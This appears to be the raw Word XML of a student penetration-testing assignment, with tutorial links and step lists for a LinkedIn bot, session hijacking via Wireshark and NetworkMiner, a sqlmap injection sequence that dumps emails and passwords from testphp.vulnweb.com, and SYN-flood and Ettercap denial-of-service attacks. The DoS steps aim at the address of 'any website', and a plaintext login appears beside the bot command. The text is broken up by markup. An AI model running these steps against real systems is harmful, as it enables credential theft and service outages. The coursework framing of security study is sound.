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NTAL:EVALUATION OF SECURITY THREATS USING PENETRATION TESTING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A) PENETRATION TESTING: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1)HACKING WEBSITE WITH SQLMAP IN KALI LINUX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http://www.kalitutorials.net/2014/03/hacking-website-with-sqlmap-in-kali.html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2)SESSION HIJACKING WITH WIRESHARK AND NETWORK MINER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https://www.youtube.com/watch?v=_5-RWC1l1Gs&amp;feature=youtu.be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3)DDOS ATTACK USING METASPLOIT AND ETTERCAP IN KALI LINUX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https://www.youtube.com/watch?v=Lvx0Zk4KufY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https://www.youtube.com/watch?v=3sjaQvddh-s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4)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LINKEDIN VEW BOTNET ATTACK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vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://youtu.be/IOvvjNi8OdU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CODES//STEPS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76" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="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BOTNET ATTACK WITH PYTHON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 to terminal in kali linux.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Sudo_easy install selenium     //install libraries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Sudo _easy install Beautifulsoup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vim LinkedInBot.py  //open editor to write code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python LinkedInBot.py </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">erplghk@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  erplghk   //run bot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 2.   SESSION HIJACKING WITH WIRESHARK AND NETWORK MINER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Connect to the website hosted at: www.lakshmiforgowri21.site90.com/btslab/login.php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using Wireshark as the sniffer of the network between the server and client sniff the connection.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Login into the account on the website by registering.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After browsing the website,log the captured data in .pcap files in wireshark.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Using Network miner ,mine the data to analyze the captured files to get all the extracted information like credentials, sessions, hosts, data,urls etc.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From this the session ID and credentials can be stolen and used by the hacker to login into the account of the website.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   3.    SQL INJECTION WITH SQLMAP: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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:shd w:fill="f0f0f0" w:val="clear"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  //URL TO ATTACK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>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15 //speeding up the process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>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs //get names of available databases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>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables//get list of tables in acuart db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>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns//get coloumns list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>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump //get password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  4      DDOS ATTACK WITH METASPLOIT AND ETTERCAP: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    METASPLOIT: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Terminal and msfconsole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auxiliary/dos/tcp/synflood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show options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get the server address to do Dos attack using another terminal window ping to any website and take the address from there.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 RHOST as the ip address of the server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exploit for SYN FLOODING.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ETTERCAP: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Open Terminal in kali linux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sudo ettercap -G //open ettercap in graphical mode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Click on Sniff-&gt;Unified Sniffing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 the network interface eth0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 To Plugins-&gt;Manage Plugins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Select the dos_attack plugin which attacks the victim by mentioning the IP address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ping in another terminal to get the ip address of the victim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Enter the ip address in ettercap and make the attack.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youtu.be/IOvvjNi8OdU" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:erplghk@gmail.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=1" TargetMode="External"/></Relationships>
</file>